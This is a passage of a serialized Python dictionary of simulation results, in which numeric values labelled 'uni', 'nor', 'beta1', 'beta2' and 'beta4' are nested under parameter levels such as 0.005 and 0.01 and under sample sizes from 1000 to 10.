0.45626898980087244}, 400: {'uni': 2.5868581455589927, 'nor': 41.97644401918418, 'beta1': 1.3845576358953788, 'beta2': 20.500958607909546, 'beta4': 0.4503472771888699}, 300: {'uni': 2.1638043642684397, 'nor': 31.371026430711506, 'beta1': 1.3272523442702153, 'beta2': 15.391703293162744, 'beta4': 0.426134575227121}, 200: {'uni': 1.8664012577325673, 'nor': 23.02116576643852, 'beta1': 1.1669422527582627, 'beta2': 9.917500823904055, 'beta4': 0.4686925986716054}, 150: {'uni': 1.7272031794635727, 'nor': 15.992174734196075, 'beta1': 1.1700097974836747, 'beta2': 7.593771525578843, 'beta4': 0.45209920535131604}, 100: {'uni': 1.5210995197369952, 'nor': 11.60348589966613, 'beta1': 1.2199502179320187, 'beta2': 5.80028326920741, 'beta4': 0.45568014305226345}, 75: {'uni': 1.3099777177647, 'nor': 9.081005946150388, 'beta1': 1.0858315960507317, 'beta2': 4.53706520639466, 'beta4': 0.4977455754301163}, 50: {'uni': 1.3698349812635664, 'nor': 6.4873540534480245, 'beta1': 1.1411439665960967, 'beta2': 3.223332209368324, 'beta4': 0.4833115916272488}, 30: {'uni': 1.113033156501957, 'nor': 4.298523360691007, 'beta1': 1.1621220740176146, 'beta2': 2.235410496252283, 'beta4': 0.515573259834472}, 20: {'uni': 1.15231886075087, 'nor': 3.1542586458579533, 'beta1': 1.0959485235296258, 'beta2': 1.8690482386517902, 'beta4': 0.6022690986627974}, 10: {'uni': 1.0545459710410021, 'nor': 2.1410930258529346, 'beta1': 1.0432471611208785, 'beta2': 1.366107687212368, 'beta4': 0.7483649469211368}}}, 0.005: {1000: {1000: {'uni': 0.8492986502558074, 'nor': 1.6502490676284018, 'beta1': 0.8928233637722481, 'beta2': 5.0465080846258035, 'beta4': 0.554324759981653}, 750: {'uni': 0.876649520000162, 'nor': 1.4627775450104223, 'beta1': 0.8927432912877891, 'beta2': 4.0831718791391065, 'beta4': 0.5839305121400691}, 500: {'uni': 0.8314273255127868, 'nor': 1.2427601107117765, 'beta1': 0.8616522044180317, 'beta2': 2.907878706545564, 'beta4': 0.6644891840401165}, 400: {'uni': 0.8711765218939584, 'nor': 1.1725637742176804, 
'beta1': 0.8945007645711051, 'beta2': 2.513524008354758, 'beta4': 0.7063402078076012}, 300: {'uni': 0.866990878802388, 'nor': 1.0601280123390195, 'beta1': 0.871577011386766, 'beta2': 1.990868873830486, 'beta4': 0.732977364574049}, 200: {'uni': 0.8484587729105408, 'nor': 1.0344752399437118, 'beta1': 0.8685203061001582, 'beta2': 1.6180514467121998, 'beta4': 0.7806210956771433}, 150: {'uni': 0.863325702964267, 'nor': 1.0163561854641152, 'beta1': 0.8609990835029007, 'beta2': 1.4501812273816659, 'beta4': 0.7933909895157425}, 100: {'uni': 0.8535173498455411, 'nor': 0.9332321122550727, 'beta1': 0.855451185502481, 'beta2': 1.2836429881798883, 'beta4': 0.8283385948050672}, 75: {'uni': 0.8719646248874783, 'nor': 0.9339021717557474, 'beta1': 0.8834615749377533, 'beta2': 1.157371893819168, 'beta4': 0.8151331566491923}, 50: {'uni': 0.8588721072497052, 'nor': 0.9324710043913952, 'beta1': 0.8592057109555745, 'beta2': 1.005974174058964, 'beta4': 0.8441503729380052}, 30: {'uni': 0.8268972332475851, 'nor': 0.8939432944293645, 'beta1': 0.8637300328894056, 'beta2': 0.9696041216651038, 'beta4': 0.8349904563989077}, 20: {'uni': 0.8575101264137438, 'nor': 0.8505944620056278, 'beta1': 0.8252029433248387, 'beta2': 0.9138477219306325, 'beta4': 0.859578392201494}, 10: {'uni': 0.8358303873495666, 'nor': 0.8475060468582208, 'beta1': 0.8198935626927145, 'beta2': 0.8863798415821968, 'beta4': 0.8028217733408507}}, 750: {1000: {'uni': 0.8893529119601304, 'nor': 1.8735326010619875, 'beta1': 0.8535189782879702, 'beta2': 5.094330840454726, 'beta4': 0.5252869847576926}, 750: {'uni': 0.8662548201881118, 'nor': 1.5939108097202517, 'beta1': 0.8620863564259129, 'beta2': 3.9224913698305763, 'beta4': 0.5565068303406758}, 500: {'uni': 0.8687024244817314, 'nor': 1.3429858216869892, 'beta1': 0.8659273649776043, 'beta2': 2.8714917333330945, 'beta4': 0.6115318046265227}, 400: {'uni': 0.8477929303428912, 'nor': 1.303342679028703, 'beta1': 0.8809644810541455, 'beta2': 2.525131323735293, 'beta4': 
0.6209718469957444}, 300: {'uni': 0.8455781800923797, 'nor': 1.1790701643940078, 'beta1': 0.8989754737431781, 'beta2': 2.0532709282654986, 'beta4': 0.7031938135827249}, 200: {'uni': 0.8523231827202161, 'nor': 1.0542529777285443, 'beta1': 0.8485149018797521, 'beta2': 1.6805292794311386, 'beta4': 0.7350427322547652}, 150: {'uni': 0.8396399434545224, 'nor': 1.0383213011327654, 'beta1': 0.8440622218870381, 'beta2': 1.4760254972629505, 'beta4': 0.7523241499310742}, 100: {'uni': 0.8566810026475448, 'nor': 1.0171647257308214, 'beta1': 0.8613367134797993, 'beta2': 1.3133239582389826, 'beta4': 0.7943525941981162}, 75: {'uni': 0.8660172203154917, 'nor': 0.9591045119200551, 'beta1': 0.8369295019442069, 'beta2': 1.1456508181998266, 'beta4': 0.8038265430699089}, 50: {'uni': 0.8916502682562102, 'nor': 0.9134648222438218, 'beta1': 0.8650674166134595, 'beta2': 1.049261212642131, 'beta4': 0.8429049932670651}, 30: {'uni': 0.8473840494179985, 'nor': 0.8593935913424329, 'beta1': 0.8549015071344843, 'beta2': 0.9488767154018491, 'beta4': 0.8370179764634424}, 20: {'uni': 0.8404817022893748, 'nor': 0.877865137025845, 'beta1': 0.8739655207876006, 'beta2': 0.928251728118239, 'beta4': 0.8381578990306405}, 10: {'uni': 0.848709588465607, 'nor': 0.8389582119738962, 'beta1': 0.8048592485731447, 'beta2': 0.8735632432997815, 'beta4': 0.8077397160130388}}, 500: {1000: {'uni': 0.8869990124500643, 'nor': 2.3926471716005158, 'beta1': 0.8656755725118289, 'beta2': 6.218693125937045, 'beta4': 0.47295872282949647}, 750: {'uni': 0.8711004704227291, 'nor': 1.9852109566671436, 'beta1': 0.8695174006440114, 'beta2': 4.849215935260051, 'beta4': 0.5053262520867102}, 500: {'uni': 0.8798487334123686, 'nor': 1.6132673631091394, 'beta1': 0.8630878624950258, 'beta2': 3.5751240393739327, 'beta4': 0.5511306421251556}, 400: {'uni': 0.903491887056683, 'nor': 1.4973046687736005, 'beta1': 0.8929322973576271, 'beta2': 3.0325455273622204, 'beta4': 0.6067709882656296}, 300: {'uni': 0.8670349102220135, 'nor': 
1.290326276042757, 'beta1': 0.839686493831913, 'beta2': 2.435890895296174, 'beta4': 0.6075123141293552}, 200: {'uni': 0.8525634185824962, 'nor': 1.2167168133729125, 'beta1': 0.8751305172873307, 'beta2': 1.8939241535011913, 'beta4': 0.6858269415712721}, 150: {'uni': 0.82194800780123, 'nor': 1.0736570375346075, 'beta1': 0.8744521367451882, 'beta2': 1.666617032750535, 'beta4': 0.7183015194836465}, 100: {'uni': 0.8480075940431231, 'nor': 1.005613242317469, 'beta1': 0.9038607200973079, 'beta2': 1.4360275830921037, 'beta4': 0.765583568088014}, 75: {'uni': 0.8379740876341786, 'nor': 1.0190740775977551, 'beta1': 0.8762896090907831, 'beta2': 1.1997858513807305, 'beta4': 0.7991634940817146}, 50: {'uni': 0.8474335678968142, 'nor': 0.966687963122637, 'beta1': 0.8814985864516113, 'beta2': 1.1013494852594226, 'beta4': 0.814899411714437}, 30: {'uni': 0.8727086391467926, 'nor': 0.8921547081202534, 'beta1': 0.8539393755115126, 'beta2': 0.9699137113255722, 'beta4': 0.8265640852509611}, 20: {'uni': 0.8509580839243661, 'nor': 0.8976419303592276, 'beta1': 0.8377850051812428, 'beta2': 0.9490003133987858, 'beta4': 0.822873280879306}, 10: {'uni': 0.8070223792543272, 'nor': 0.8222121101020897, 'beta1': 0.8169261630244183, 'beta2': 0.8687590176135066, 'beta4': 0.8358281226159047}}, 400: {1000: {'uni': 0.8322925059461799, 'nor': 2.772959248898575, 'beta1': 0.8893671382511937, 'beta2': 6.069963280541391, 'beta4': 0.4477691999805573}, 750: {'uni': 0.8613686583710596, 'nor': 2.2314767356879326, 'beta1': 0.8568956660509862, 'beta2': 4.854992785999708, 'beta4': 0.4832858323318025}, 500: {'uni': 0.8567699511619379, 'nor': 1.8200600461414693, 'beta1': 0.9080785163321283, 'beta2': 3.4157894226102203, 'beta4': 0.551367596609852}, 400: {'uni': 0.8369044265082584, 'nor': 1.5845080295693856, 'beta1': 0.8500625111572069, 'beta2': 2.9594155017882446, 'beta4': 0.5474817232894605}, 300: {'uni': 0.8687488891518946, 'nor': 1.4620428679624027, 'beta1': 0.8877443382363509, 'beta2': 2.481100386426921, 'beta4': 
0.5937679151105709}, 200: {'uni': 0.8268590674018326, 'nor': 1.2437500818930782, 'beta1': 0.8799053584315863, 'beta2': 1.9723014293020296, 'beta4': 0.6786183666437543}, 150: {'uni': 0.8589374510858506, 'nor': 1.1816870309605243, 'beta1': 0.8718362510385768, 'beta2': 1.6860574439544969, 'beta4': 0.7224050217211732}, 100: {'uni': 0.8637240017119076, 'nor': 1.0352677456743422, 'beta1': 0.8417017245035276, 'beta2': 1.409613185720384, 'beta4': 0.7405058894550209}, 75: {'uni': 0.8637532375150383, 'nor': 0.9779373487935997, 'beta1': 0.8781013460358983, 'beta2': 1.237799529212922, 'beta4': 0.763051811457541}, 50: {'uni': 0.8469820141871477, 'nor': 0.9527738404825348, 'beta1': 0.854958580126025, 'beta2': 1.1302429451594769, 'beta4': 0.8011092866946141}, 30: {'uni': 0.8736551317015678, 'nor': 0.8951809427802495, 'beta1': 0.8825847779488676, 'beta2': 0.976513604820869, 'beta4': 0.8236922508203844}, 20: {'uni': 0.8445914174745024, 'nor': 0.8978427140297524, 'beta1': 0.8285384005464761, 'beta2': 0.9441752062117178, 'beta4': 0.8079416993063016}, 10: {'uni': 0.8059582553072695, 'nor': 0.8422271125818357, 'beta1': 0.822948579547678, 'beta2': 0.8530417818519627, 'beta4': 0.7908692241190146}}, 300: {1000: {'uni': 0.85015130833887, 'nor': 3.434760468098905, 'beta1': 0.8571894410585443, 'beta2': 6.921244428990534, 'beta4': 0.4092729787000081}, 750: {'uni': 0.862825596472843, 'nor': 2.7875235825000546, 'beta1': 0.8942786992828993, 'beta2': 5.640485944820529, 'beta4': 0.4523328926527227}, 500: {'uni': 0.8612530107937411, 'nor': 2.087138712332073, 'beta1': 0.8499689110732196, 'beta2': 3.9314480214815304, 'beta4': 0.48599991641199985}, 400: {'uni': 0.8719345715637321, 'nor': 1.948459695654461, 'beta1': 0.8535901226550221, 'beta2': 3.376116676834797, 'beta4': 0.5307479361442003}, 300: {'uni': 0.8670545417493539, 'nor': 1.5564108606749094, 'beta1': 0.8498653001731661, 'beta2': 2.8470550015231573, 'beta4': 0.5693301542257994}, 200: {'uni': 0.8668097879968475, 'nor': 1.3376277704327313, 
'beta1': 0.8315542163435912, 'beta2': 2.2063579986840036, 'beta4': 0.6039260854671632}, 150: {'uni': 0.8271864622954613, 'nor': 1.2200355388246191, 'beta1': 0.883742467942023, 'beta2': 1.869013842158086, 'beta4': 0.643155393507137}, 100: {'uni': 0.8638972306464799, 'nor': 1.1342641709471044, 'beta1': 0.8598375912189091, 'beta2': 1.5120532688493489, 'beta4': 0.7403717834928402}, 75: {'uni': 0.8583473461451383, 'nor': 1.0800462905879058, 'beta1': 0.8923649808568489, 'beta2': 1.3317255953293965, 'beta4': 0.7345166246898442}, 50: {'uni': 0.8746732518178894, 'nor': 0.9675091473720824, 'beta1': 0.869571585857279, 'beta2': 1.1552038645884999, 'beta4': 0.758415241068141}, 30: {'uni': 0.8799939789005814, 'nor': 0.9517419294376883, 'beta1': 0.8743679176044513, 'beta2': 1.033882047029358, 'beta4': 0.820234969285508}, 20: {'uni': 0.8351927773424345, 'nor': 0.9115728880522416, 'beta1': 0.8661553510614836, 'beta2': 0.9463253532297905, 'beta4': 0.8267082483693564}, 10: {'uni': 0.8406316325477106, 'nor': 0.8314613208194097, 'beta1': 0.8415689332783691, 'beta2': 0.8676067009565547, 'beta4': 0.7923546623661532}}, 200: {1000: {'uni': 0.8857663238193778, 'nor': 4.680179487924737, 'beta1': 0.8596985445949961, 'beta2': 8.640727300137126, 'beta4': 0.3894629855731228}, 750: {'uni': 0.8822609513200822, 'nor': 3.6240629787778325, 'beta1': 0.8509327610699031, 'beta2': 7.06440107867899, 'beta4': 0.4136128719602394}, 500: {'uni': 0.8951511408281749, 'nor': 2.706478161877119, 'beta1': 0.8750179255888083, 'beta2': 4.923212625453092, 'beta4': 0.4438676650195852}, 400: {'uni': 0.8621099039944393, 'nor': 2.3112226100492634, 'beta1': 0.8637393226967995, 'beta2': 4.142311379028304, 'beta4': 0.4989802884758265}, 300: {'uni': 0.8815086783155325, 'nor': 1.973012357083618, 'beta1': 0.8855622176886478, 'beta2': 3.245637925919703, 'beta4': 0.5014064302476238}, 200: {'uni': 0.8328108622368053, 'nor': 1.5986517188378813, 'beta1': 0.8670516338633621, 'beta2': 2.441582595720951, 'beta4': 0.5675354711561659}, 
150: {'uni': 0.8509108075288516, 'nor': 1.437846992896105, 'beta1': 0.836851186717404, 'beta2': 1.9740942359159892, 'beta4': 0.613923547729645}, 100: {'uni': 0.8768933007965606, 'nor': 1.2219082590934622, 'beta1': 0.8710445433259488, 'beta2': 1.6652834592979155, 'beta4': 0.6807453974973048}, 75: {'uni': 0.8696669504918266, 'nor': 1.124306793828307, 'beta1': 0.8708924475587642, 'beta2': 1.4585340544518133, 'beta4': 0.6921789139786938}, 50: {'uni': 0.890137756708636, 'nor': 1.0380991897651526, 'beta1': 0.9038916870128674, 'beta2': 1.2617159118800856, 'beta4': 0.737301894421063}, 30: {'uni': 0.8577280992654713, 'nor': 0.9922674847278834, 'beta1': 0.8495021132831815, 'beta2': 1.1148815215500807, 'beta4': 0.7716495960817314}, 20: {'uni': 0.8719153771105802, 'nor': 0.9596683679575053, 'beta1': 0.8591127846243085, 'beta2': 0.9966712227887798, 'beta4': 0.8093952871372214}, 10: {'uni': 0.8302695587113106, 'nor': 0.8708970655099307, 'beta1': 0.823064138178113, 'beta2': 0.8889092964712426, 'beta4': 0.7977767176653532}}, 150: {1000: {'uni': 0.8986138998052507, 'nor': 5.7834675088135725, 'beta1': 0.8490270056828785, 'beta2': 10.407206757701623, 'beta4': 0.3788903299147765}, 750: {'uni': 0.8647457935668315, 'nor': 4.597985491272376, 'beta1': 0.8826314946034581, 'beta2': 7.917017378008792, 'beta4': 0.3939613164237079}, 500: {'uni': 0.8814291871824029, 'nor': 3.2742679017557763, 'beta1': 0.8645904562415648, 'beta2': 5.474819990031853, 'beta4': 0.4201942139903767}, 400: {'uni': 0.8719096515847061, 'nor': 2.8229044013952347, 'beta1': 0.8701785960891302, 'beta2': 4.581611606290644, 'beta4': 0.4331012710758666}, 300: {'uni': 0.8854658111693259, 'nor': 2.34542108556634, 'beta1': 0.8409188898825175, 'beta2': 3.5960889166936094, 'beta4': 0.4756845407835292}, 200: {'uni': 0.8701625486580659, 'nor': 1.8358292727217536, 'beta1': 0.8532097190695673, 'beta2': 2.72141338340365, 'beta4': 0.5228322599770573}, 150: {'uni': 0.8883732054354728, 'nor': 1.6784341004883028, 'beta1': 
0.8480800478874988, 'beta2': 2.3548864538236587, 'beta4': 0.5478575722636306}, 100: {'uni': 0.8848899944215347, 'nor': 1.39003511176849, 'beta1': 0.8928556014396124, 'beta2': 1.7581183428124922, 'beta4': 0.6319233921298026}, 75: {'uni': 0.8476576587132466, 'nor': 1.2109186887878762, 'beta1': 0.8549274883770003, 'beta2': 1.5588624857940563, 'beta4': 0.6711749929357153}, 50: {'uni': 0.878992168637968, 'nor': 1.0893345758288648, 'beta1': 0.8571678620038059, 'beta2': 1.2936364210958133, 'beta4': 0.6911762280795586}, 30: {'uni': 0.8386807997491547, 'nor': 0.982291187821282, 'beta1': 0.8808367008354709, 'beta2': 1.0816297459507884, 'beta4': 0.7557102904498407}, 20: {'uni': 0.8307168833220502, 'nor': 0.9767678583343402, 'beta1': 0.8564594109233339, 'beta2': 0.989911410784959, 'beta4': 0.748952291872636}, 10: {'uni': 0.8194083425516434, 'nor': 0.8775832793387287, 'beta1': 0.8471358818316647, 'beta2': 0.8995129578120127, 'beta4': 0.7862318620719233}}, 100: {1000: {'uni': 0.8946637816542238, 'nor': 8.603780168858798, 'beta1': 0.8819450133887767, 'beta2': 12.286473618618768, 'beta4': 0.3681993165409592}, 750: {'uni': 0.9047095939989102, 'nor': 6.544331357001899, 'beta1': 0.8768385993384246, 'beta2': 9.510849254140902, 'beta4': 0.3748657037149706}, 500: {'uni': 0.8828573534389809, 'nor': 4.589167917409369, 'beta1': 0.8687021342851984, 'beta2': 6.4569490799550255, 'beta4': 0.4012132277414978}, 400: {'uni': 0.8816824734545268, 'nor': 3.8702556930171457, 'beta1': 0.868410778897242, 'beta2': 5.358536995714846, 'beta4': 0.39772599926896646}, 300: {'uni': 0.8487402016109327, 'nor': 3.13370246160681, 'beta1': 0.8839192006334508, 'beta2': 4.377387315114399, 'beta4': 0.43260286490656286}, 200: {'uni': 0.8550948483316095, 'nor': 2.2941222796515564, 'beta1': 0.8840654113992507, 'beta2': 3.1793274396848537, 'beta4': 0.4693380740694391}, 150: {'uni': 0.8726854391556464, 'nor': 1.9987190523931557, 'beta1': 0.8640065941351514, 'beta2': 2.4550201259308606, 'beta4': 0.5029338662023729}, 100: 
{'uni': 0.8744011176190648, 'nor': 1.599629546114851, 'beta1': 0.8758350528124487, 'beta2': 1.8341702678156442, 'beta4': 0.5535398055771565}, 75: {'uni': 0.8816360483295717, 'nor': 1.396209177505365, 'beta1': 0.8588496604966374, 'beta2': 1.7587314717424098, 'beta4': 0.6000984093869451}, 50: {'uni': 0.8444691076907881, 'nor': 1.2083130325494273, 'beta1': 0.8577643593273495, 'beta2': 1.4376280924624785, 'beta4': 0.6608219126680412}, 30: {'uni': 0.8186744117785408, 'nor': 1.070965603891437, 'beta1': 0.8483324727506986, 'beta2': 1.1580907306458454, 'beta4': 0.7234734928182613}, 20: {'uni': 0.8400701531478934, 'nor': 1.000113988644385, 'beta1': 0.8321822290696924, 'beta2': 1.0710298849251567, 'beta4': 0.7339870282448464}, 10: {'uni': 0.8382328001002571, 'nor': 0.9092521075722466, 'beta1': 0.8359072328233461, 'beta2': 0.9120018345512748, 'beta4': 0.7663868495863666}}, 75: {1000: {'uni': 0.9392011817188017, 'nor': 10.904728772367289, 'beta1': 0.866624607543039, 'beta2': 13.539885930108083, 'beta4': 0.3534109865942192}, 750: {'uni': 0.9355897301990589, 'nor': 8.230208100553527, 'beta1': 0.8573793409512389, 'beta2': 10.554777001721034, 'beta4': 0.3707815481206261}, 500: {'uni': 0.902737130958842, 'nor': 5.9005448659039414, 'beta1': 0.9039620810225308, 'beta2': 7.009224078205305, 'beta4': 0.37752549840973754}, 400: {'uni': 0.8820840867138475, 'nor': 4.906683628702614, 'beta1': 0.8471201075727584, 'beta2': 5.811385171318147, 'beta4': 0.37395562054497417}, 300: {'uni': 0.8905762412970645, 'nor': 3.8692194969852842, 'beta1': 0.9120410272155509, 'beta2': 4.664194484656855, 'beta4': 0.4126825810690872}, 200: {'uni': 0.8389878062923508, 'nor': 2.8755206530986688, 'beta1': 0.8502879253313526, 'beta2': 3.3092550616564202, 'beta4': 0.42921847952639935}, 150: {'uni': 0.8439913453823732, 'nor': 2.2602699891688856, 'beta1': 0.8817858849869306, 'beta2': 2.6797847545171676, 'beta4': 0.47138132435008684}, 100: {'uni': 0.8589328530157215, 'nor': 1.8035701933261568, 'beta1': 
0.8723921800108287, 'beta2': 1.9841585248871425, 'beta4': 0.5132672551619654}, 75: {'uni': 0.8494008654992535, 'nor': 1.6071498176774344, 'beta1': 0.8921558615811434, 'beta2': 1.7948054307860677, 'beta4': 0.5600945143875852}, 50: {'uni': 0.8459905263294217, 'nor': 1.3456446878132973, 'beta1': 0.8360437432777298, 'beta2': 1.4098100528261963, 'beta4': 0.5995871991066353}, 30: {'uni': 0.863255907688344, 'nor': 1.163832926785131, 'beta1': 0.8610017576182266, 'beta2': 1.2221297578160732, 'beta4': 0.6852793799758119}, 20: {'uni': 0.8208301547311144, 'nor': 1.0466688062181275, 'beta1': 0.8659319938555088, 'beta2': 1.0233244108524449, 'beta4': 0.7240872799802124}, 10: {'uni': 0.8032328211939312, 'nor': 0.9417402156036838, 'beta1': 0.8526278553950033, 'beta2': 0.9217056736337736, 'beta4': 0.7718520630849283}}, 50: {1000: {'uni': 1.0415495975920712, 'nor': 16.265730359177034, 'beta1': 0.8877957838662055, 'beta2': 16.885442852467367, 'beta4': 0.3448739500232382}, 750: {'uni': 1.0098033949308896, 'nor': 12.258570778017333, 'beta1': 0.8706995791907859, 'beta2': 12.395166093820881, 'beta4': 0.35315381524036327}, 500: {'uni': 0.9415139858342592, 'nor': 8.481807472429985, 'beta1': 0.8972503865903044, 'beta2': 8.392611665283725, 'beta4': 0.36998606207623813}, 400: {'uni': 0.9115614150434282, 'nor': 6.710526205260556, 'beta1': 0.8363890434236055, 'beta2': 6.893481197785906, 'beta4': 0.35909227964437845}, 300: {'uni': 0.8787877860539303, 'nor': 5.174832246974513, 'beta1': 0.8566295227226275, 'beta2': 5.494166649585702, 'beta4': 0.3906665116470583}, 200: {'uni': 0.868109213219911, 'nor': 3.8785570981039923, 'beta1': 0.8486507394057397, 'beta2': 3.967316649529905, 'beta4': 0.4099010863230901}, 150: {'uni': 0.8521655040528395, 'nor': 3.089208594179127, 'beta1': 0.86485525155687, 'beta2': 3.1562227864035775, 'beta4': 0.4259916065124458}, 100: {'uni': 0.8538795335041026, 'nor': 2.345951444856802, 'beta1': 0.8576683025117604, 'beta2': 2.34371617917428, 'beta4': 0.47209240963168714}, 75: 
{'uni': 0.8518076855463557, 'nor': 2.004537103880557, 'beta1': 0.8924709495111173, 'beta2': 1.943645059238237, 'beta4': 0.5024138107270238}, 50: {'uni': 0.8529988890643148, 'nor': 1.637600402682281, 'beta1': 0.887282270801599, 'beta2': 1.5942525719928833, 'beta4': 0.5461737896321196}, 30: {'uni': 0.8317247039979097, 'nor': 1.2728847122349543, 'beta1': 0.8763974125117077, 'beta2': 1.2510718185241683, 'beta4': 0.6168812853181134}, 20: {'uni': 0.8288102680813932, 'nor': 1.127591734617398, 'beta1': 0.8484767896870734, 'beta2': 1.0683362295171508, 'beta4': 0.6634916799393047}, 10: {'uni': 0.8176133987807528, 'nor': 0.962361595088012, 'beta1': 0.8463373485431211, 'beta2': 0.9792459537116653, 'beta4': 0.7132996896249393}}, 30: {1000: {'uni': 1.2696860283761329, 'nor': 27.028546181049798, 'beta1': 0.8886841713466621, 'beta2': 21.836331871174327, 'beta4': 0.34885048965467425}, 750: {'uni': 1.1759720018152577, 'nor': 20.606898542988638, 'beta1': 0.8823359568565259, 'beta2': 16.492206692516675, 'beta4': 0.3456789491663497}, 500: {'uni': 1.0607922271898333, 'nor': 13.499694108821545, 'beta1': 0.8704093259926938, 'beta2': 10.840977904557175, 'beta4': 0.3586589082724464}, 400: {'uni': 1.034149292980726, 'nor': 10.918561084901162, 'beta1': 0.8744363285476298, 'beta2': 8.989655953402785, 'beta4': 0.35894729709119183}, 300: {'uni': 0.9693906483358444, 'nor': 8.511512725546728, 'beta1': 0.8913582403756317, 'beta2': 6.734747049938925, 'beta4': 0.3571048621894059}, 200: {'uni': 0.9295062768532519, 'nor': 5.726145369760396, 'beta1': 0.8464608450876929, 'beta2': 4.740491290627747, 'beta4': 0.3753071091113352}, 150: {'uni': 0.8911914980160859, 'nor': 4.786527437358327, 'beta1': 0.9029710546460754, 'beta2': 3.627949786933054, 'beta4': 0.3868813723011823}, 100: {'uni': 0.8741205713557936, 'nor': 3.3912944344384437, 'beta1': 0.8420955501315833, 'beta2': 2.740025646984923, 'beta4': 0.42282517623248606}, 75: {'uni': 0.8417413679465983, 'nor': 2.770535795664202, 'beta1': 0.8689267525581056, 
'beta2': 2.3351824154600016, 'beta4': 0.4355723263901833}, 50: {'uni': 0.8293019485037857, 'nor': 2.1331783667990547, 'beta1': 0.8636890393573666, 'beta2': 1.795449942087839, 'beta4': 0.47663699780502283}, 30: {'uni': 0.8398719438451165, 'nor': 1.5873110864904567, 'beta1': 0.8458052978100878, 'beta2': 1.3157854252669225, 'beta4': 0.542696670833237}, 20: {'uni': 0.8588110918111577, 'nor': 1.370992161006879, 'beta1': 0.8127388456820281, 'beta2': 1.2066500169529317, 'beta4': 0.6136617948645082}, 10: {'uni': 0.8082099171087873, 'nor': 1.122302969663073, 'beta1': 0.7984881402335584, 'beta2': 0.9808222408488511, 'beta4': 0.7086263964034699}}, 20: {1000: {'uni': 1.7845594214279576, 'nor': 40.15832565029172, 'beta1': 0.950259894237407, 'beta2': 25.861562337744196, 'beta4': 0.32973420092003286}, 750: {'uni': 1.5897522441647864, 'nor': 28.315155657619325, 'beta1': 0.913891705486057, 'beta2': 20.117293413810955, 'beta4': 0.34329017661554695}, 500: {'uni': 1.3030580424170426, 'nor': 20.253228491861286, 'beta1': 0.9220502576370694, 'beta2': 13.583692929451516, 'beta4': 0.35295824845181184}, 400: {'uni': 1.2511593986123553, 'nor': 16.721863866209368, 'beta1': 0.8890682031702455, 'beta2': 11.11481009070622, 'beta4': 0.3504685746126408}, 300: {'uni': 1.1556472143034846, 'nor': 12.530843145240851, 'beta1': 0.8995531892253813, 'beta2': 8.478893847650728, 'beta4': 0.34635706601890454}, 200: {'uni': 1.002551669149528, 'nor': 8.576294654093017, 'beta1': 0.8723105746829944, 'beta2': 5.853099794656523, 'beta4': 0.36846801010142255}, 150: {'uni': 0.9694379710633484, 'nor': 6.690519847813086, 'beta1': 0.8717961407072875, 'beta2': 4.597201584965225, 'beta4': 0.3659628260777635}, 100: {'uni': 0.8977854726841326, 'nor': 4.692828531090058, 'beta1': 0.8496010281273996, 'beta2': 3.1550068582035578, 'beta4': 0.38511701524257447}, 75: {'uni': 0.9118678625047828, 'nor': 3.7324572320229095, 'beta1': 0.8652199493328219, 'beta2': 2.529492997234143, 'beta4': 0.40778432043338764}, 50: {'uni': 
0.8543398305647835, 'nor': 2.876515939258069, 'beta1': 0.83415119798805, 'beta2': 1.978057747859159, 'beta4': 0.4411959818288761}, 30: {'uni': 0.8433281461496579, 'nor': 1.9748223737762594, 'beta1': 0.8359570278817351, 'beta2': 1.463749824817638, 'beta4': 0.4833063970512745}, 20: {'uni': 0.8332039379907832, 'nor': 1.5857551546674844, 'beta1': 0.8245999245393716, 'beta2': 1.2217108424486114, 'beta4': 0.5416079971879648}, 10: {'uni': 0.767644168526127, 'nor': 1.186352156756191, 'beta1': 0.8038565208106804, 'beta2': 0.9942753593007874, 'beta4': 0.631678251643074}}, 10: {1000: {'uni': 3.753193315878337, 'nor': 80.54961219964801, 'beta1': 1.4544532440986977, 'beta2': 37.457752389369944, 'beta4': 0.33787557256732886}, 750: {'uni': 3.13190540427256, 'nor': 61.39195913384035, 'beta1': 1.2853163542779982, 'beta2': 28.219925280709226, 'beta4': 0.3438604922632593}, 500: {'uni': 2.361928334320761, 'nor': 39.264786613414124, 'beta1': 1.0987827263867904, 'beta2': 19.44333576209149, 'beta4': 0.34485169875041716}, 400: {'uni': 2.0476194993736376, 'nor': 32.94817315559009, 'beta1': 1.0488861998480152, 'beta2': 15.54348581454614, 'beta4': 0.33462832934226017}, 300: {'uni': 1.7346022453973275, 'nor': 24.123522158092758, 'beta1': 0.9961117172285985, 'beta2': 11.539236263935074, 'beta4': 0.3497737633950961}, 200: {'uni': 1.4525939834033061, 'nor': 16.34875245088017, 'beta1': 0.9253876022802889, 'beta2': 8.020657570999116, 'beta4': 0.34879974403231523}, 150: {'uni': 1.298454489895215, 'nor': 12.039103036503901, 'beta1': 0.8983179227349697, 'beta2': 6.1480857184206545, 'beta4': 0.3515031726202898}, 100: {'uni': 1.149106274875983, 'nor': 8.792370330870405, 'beta1': 0.8859050703287877, 'beta2': 4.127419446528227, 'beta4': 0.37328300271926307}, 75: {'uni': 1.0510563523184537, 'nor': 6.690824582353118, 'beta1': 0.8676483571212735, 'beta2': 3.261862421040156, 'beta4': 0.35955743890308756}, 50: {'uni': 0.944355604551499, 'nor': 4.8498605482734485, 'beta1': 0.856890203472039, 'beta2': 
2.40472627933374, 'beta4': 0.3740413835304806}, 30: {'uni': 0.856343008929495, 'nor': 3.122509717131945, 'beta1': 0.7969111331070415, 'beta2': 1.6917780539337604, 'beta4': 0.420410921911824}, 20: {'uni': 0.8184308142900829, 'nor': 2.404727094095177, 'beta1': 0.8086310697032824, 'beta2': 1.4107687480292843, 'beta4': 0.44807980574077305}, 10: {'uni': 0.7832503930172614, 'nor': 1.5626869225976665, 'beta1': 0.7853435742092469, 'beta2': 1.0642285862729415, 'beta4': 0.5256048778718274}}}, 0.01: {1000: {1000: {'uni': 0.7219503597168808, 'nor': 1.3522899382499511, 'beta1': 0.7503888090005709, 'beta2': 4.359712279210015, 'beta4': 0.47805541074462554}, 750: {'uni': 0.7460653360509083, 'nor': 1.2215802732877805, 'beta1': 0.7579034372202724, 'beta2': 3.44439122365882, 'beta4': 0.5013760660613135}, 500: {'uni': 0.7457104709224507, 'nor': 1.0274833085776511, 'beta1': 0.7356416860323749, 'beta2': 2.379942654242188, 'beta4': 0.5628465543348214}, 400: {'uni': 0.7540793490028289, 'nor': 0.9939475957798122, 'beta1': 0.7677563353825323, 'beta2': 2.085462426476235, 'beta4': 0.5902860977216214}, 300: {'uni': 0.7416999961068458, 'nor': 0.9093968404709234, 'beta1': 0.7454049674434894, 'beta2': 1.707950964614366, 'beta4': 0.6001696878842937}, 200: {'uni': 0.7524857828756578, 'nor': 0.890322894897767, 'beta1': 